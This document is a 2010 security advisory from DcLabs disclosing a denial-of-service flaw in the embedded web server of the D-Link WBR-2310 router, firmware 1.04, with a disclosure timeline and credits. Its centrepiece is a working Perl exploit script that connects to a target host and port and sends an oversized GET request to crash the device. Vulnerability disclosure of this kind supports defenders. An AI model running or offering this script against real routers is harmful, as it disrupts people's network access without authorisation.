[DCA-00014]

[Software]

 - Dlink WBR-2310 Embedded Web Server

[Vendor Product Description]

 - The D-Link RangeBooster G™ WBR-2310 with enhanced 108 features the
industry’s first default 108Mbps* “Dynamic Mode” that allows clients
to always operate at the highest possible speeds while automatically
identifying and recognizing other D-Link RangeBooster G™ products for
highest performance capability and seamless access to the wireless
network in a homogeneous environment.

[Bug Description]

 - The Embedded Web Server does not sanitize correctly a crafted GET
request leading to Denial-of-Service.

[History]

 - Advisory sent to vendor on 07/20/2010
 - No response from vendor
 - We tried to contact again on 07/30/2010
 - No response from vendor
 - Public advisory & exploit 08/02/2010.

[Impact]

 - Low-Medium

[Affected Version]

 - Firmware Version: 1.04
 - Hardware Version: A1
 - Prior versions may also be vulnerable

[Code]

#!/usr/bin/perl
use IO::Socket;

        if (@ARGV < 1) {
                usage();
        }

        $ip     = $ARGV[0];
        $port   = $ARGV[1];

        print "[+] Sending request...\n";

        $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";
        print $socket "GET
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n";

        sleep(3);
        close($socket);

        print "[+] Done!\n";

sub usage() {
        print "[-] Usage: <". $0 ."> <host> <port>\n";
        print "[-] Example: ". $0 ." 192.168.0.1 80\n";
        exit;
}


[Credits]

Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br


[Greetz]
Crash and all Dclabs members.

-- 
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br